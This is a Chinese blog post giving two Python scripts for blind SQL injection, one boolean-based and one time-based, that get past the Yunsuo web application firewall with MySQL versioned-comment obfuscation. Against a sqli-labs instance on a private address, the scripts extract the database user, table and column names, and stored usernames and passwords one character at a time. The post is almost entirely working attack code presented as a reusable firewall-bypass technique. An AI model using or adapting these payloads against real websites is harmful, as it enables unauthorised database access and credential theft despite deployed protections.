目录[ Hide ]
  1. 0x01:前言
  2. 0x02:基于布尔
  3. 0x03:基于延时
  4. 0x04:结语

0x01:前言

前面写过关于过云锁的tamper,但是局限性也是显而易见的,只支持联合注入...本来是打算把其他注入方式的tamper写一下的,但是实际编写的时候,发现盲注对于sqlmap局限性有点大,与其编写tamper还不如自己写脚本 。其实云锁较之狗更简单,因为它过滤的东西很少,难点就在select from,绕过去就ok了

0x02:基于布尔

#coding:utf-8
#by pureqh

import requests
sql=""
for i in range(1,17):
    for j in range(33,127):
        #url = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ ascii(substr((select user/*!80000aaa*/()),"+str(i)+",1))="+str(j)+" /*!11444and*/ '1'='1"
        #url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!11444select table_name from information_schema.tables where table_schema=database/*!80000aaa*/() limit 3,1),"+str(i)+",1))="+str(j)+" */--+"
        #url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!11444select group_concat(column_name) from information_schema.columns where table_schema='security' ),"+str(i)+",1))="+str(j)+" */--+"
        url = "http://192.168.150.139/sqli/Less-5/?id=1'/*!11444and*/ ascii(substr((/*!11444select group_concat(username,password) from users),"+str(i)+",1))="+str(j)+" */--+"
        r = requests.get(url=url)
        if "are" in r.content:
            sql+=chr(j)
            print sql
            break

0x03:基于延时

#coding:utf-8
#by pureqh
import requests

sql = ''
for x in range(1,300):
     for y in range(33,127):
         #url1 = "http://192.168.150.139/sqli/Less-9/?id=1' /*!11444and*/ if(((ascii(substr((select database/*!80000aaa*/()),%d,1)))=%d),sleep/**/(/*!2*/),false) /*!11444and*/ '1' = '1"
         #url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!11444select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))=%d,sleep(2),false) */--+"
         #url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!11444select group_concat(column_name) from information_schema.columns where table_schema='security'),%d,1))=%d,sleep(2),false) */--+"
         url1 = "http://192.168.150.139/sqli/Less-5/?id=1' /*!11444and*/ if(ascii(substr((/*!11444select group_concat(username,password) from users),%d,1))=%d,sleep(2),false) */--+"
         url2 = url1%(x,y)
         try:
             f = requests.get(url=url2,timeout=1.5)
         except:
             sql+=chr(y)
             print sql
             break

0x04:结语

这里依然使用了遍历ASCII码的方式,没有使用二分法,所以速度慢的要命。最近也没时间优化,先放这里吧。

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注